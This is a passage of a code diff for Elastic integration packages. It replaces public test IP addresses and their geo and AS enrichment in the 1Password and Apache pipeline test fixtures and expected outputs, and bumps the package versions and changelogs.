diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index 942a3b88c39..3ae475f53fd 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json index 926a1ae7d4b..2815f0b47ac 100644 --- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json +++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json @@ -2,11 +2,11 @@ "events": [ { "@timestamp": "2021-08-30T22:57:42.484Z", - "message": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}" + "message": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}" }, { "@timestamp": "2021-08-30T22:57:42.484Z", - "message": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}" + "message": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}" } ] } \ No newline at end of file diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json index dd39235fd29..c5e3363a0aa 100644 --- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json +++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json @@ -1,19 +1,6 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "used_version": 1, "client": { @@ -27,38 +14,55 @@ "vault_uuid": "jaqxqf5qylslqiitnduawrndc5" }, "@timestamp": "2021-08-30T18:57:42.484Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.123174500Z", + "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", "type": [ "access" - ] + ], + "created": "2021-08-30T22:57:42.484Z", + "kind": "event" }, "user": { "email": "email@1password.com", @@ -70,19 +74,6 @@ ] }, { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "used_version": 1, "client": { @@ -96,38 +87,55 @@ "vault_uuid": "jaqxqf5qylslqiitnduawrndc5" }, "@timestamp": "2021-08-30T19:10:00.123Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.123178700Z", + "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", "type": [ "access" - ] + ], + "created": "2021-08-30T22:57:42.484Z", + "kind": "event" }, "user": { "email": "email@1password.com", diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json index 53c12222c4e..d43ccf567f5 100644 --- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json +++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json @@ -2,11 +2,11 @@ "events": [ { "@timestamp": "2021-08-30T22:57:42.484Z", - "message": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}" + "message": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}" }, { "@timestamp": "2021-08-30T22:57:42.484Z", - "message": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}" + "message": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}" } ] } \ No newline at end of file diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json index 7c0e571dfd2..42bc15c2db4 100644 --- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json +++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json @@ -1,19 +1,6 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "country": "AR", "client": { @@ -28,40 +15,57 @@ "session_uuid": "UED4KFZ5BH37IQWTJ7LG4VPWK7" }, "@timestamp": "2021-08-11T14:28:03.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.577677500Z", + "original": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", + "created": "2021-08-30T22:57:42.484Z", + "kind": "event", "action": "success", "category": [ "authentication" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", - "outcome": "success", "type": [ "info" - ] + ], + "outcome": "success" }, "user": { "email": "email@1password.com", @@ -73,19 +77,6 @@ ] }, { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "country": "AR", "client": { @@ -100,40 +91,57 @@ "session_uuid": "UED4KFZ5BH37IQWTJ7LG4VPWK7" }, "@timestamp": "2021-08-11T15:04:22.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.577687Z", + "original": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", + "created": "2021-08-30T22:57:42.484Z", + "kind": "event", "action": "credentials_failed", "category": [ "authentication" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", - "outcome": "failure", "type": [ "info" - ] + ], + "outcome": "failure" }, "user": { "email": "email@1password.com", diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index 41bf202ed8c..d2cfdae6fe6 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: 1password title: "1Password Events Reporting" -version: 0.2.0 +version: 0.2.1 license: basic description: Collect events from 1Password Events API with Elastic Agent. type: integration diff --git a/packages/apache/changelog.yml b/packages/apache/changelog.yml index 4afe40be147..565a75f4861 100644 --- a/packages/apache/changelog.yml +++ b/packages/apache/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.2" changes: - description: Fix ML module manifest query to ignore frozen and cold tiers diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json index ff3100d9c96..481ed5c4e5d 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.054928200Z", + "ingested": "2021-12-09T13:30:29.903774500Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -77,7 +77,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.054985900Z", + "ingested": "2021-12-09T13:30:29.903783200Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -119,7 +119,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.054995600Z", + "ingested": "2021-12-09T13:30:29.903788600Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -166,7 +166,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055003900Z", + "ingested": "2021-12-09T13:30:29.903792500Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -223,7 +223,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055010300Z", + "ingested": "2021-12-09T13:30:29.903797600Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /status HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -271,7 +271,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T07:19:56.055016Z", + "ingested": "2021-12-09T13:30:29.903803900Z", "original": "127.0.0.1 - - [02/Feb/2019:05:38:45 +0100] \"-\" 408 152 \"-\" \"-\"", "category": "web", "kind": "event", @@ -326,7 +326,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055021900Z", + "ingested": "2021-12-09T13:30:29.903809300Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log index 1498b23dedd..6b1ba50b177 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log @@ -1,6 +1,6 @@ ::1 - - [26/Dec/2016:16:16:28 +0200] "GET / HTTP/1.1" 200 45 ::1 - - [26/Dec/2016:16:16:29 +0200] "GET /favicon.ico HTTP/1.1" 404 209 ::1 - - [26/Dec/2016:16:16:48 +0200] "-" 408 - -77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45 -77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206 -77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201 +89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45 +89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206 +89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201 diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json index e513b05442b..c893102f466 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288458400Z", + "ingested": "2021-12-09T13:30:30.879403900Z", "original": "::1 - - [26/Dec/2016:16:16:28 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -68,7 +68,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288480800Z", + "ingested": "2021-12-09T13:30:30.879409400Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -105,7 +105,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288486700Z", + "ingested": "2021-12-09T13:30:30.879413800Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -142,28 +142,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288491300Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", + "ingested": "2021-12-09T13:30:30.879418Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", @@ -203,28 +203,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288496800Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", + "ingested": "2021-12-09T13:30:30.879422100Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", @@ -264,28 +264,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288501500Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", + "ingested": "2021-12-09T13:30:30.879427100Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log index 5b65e3235d5..0a59aed766c 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log @@ -1,2 +1,2 @@ [10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D&nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1" 1375 -[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" - +[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET 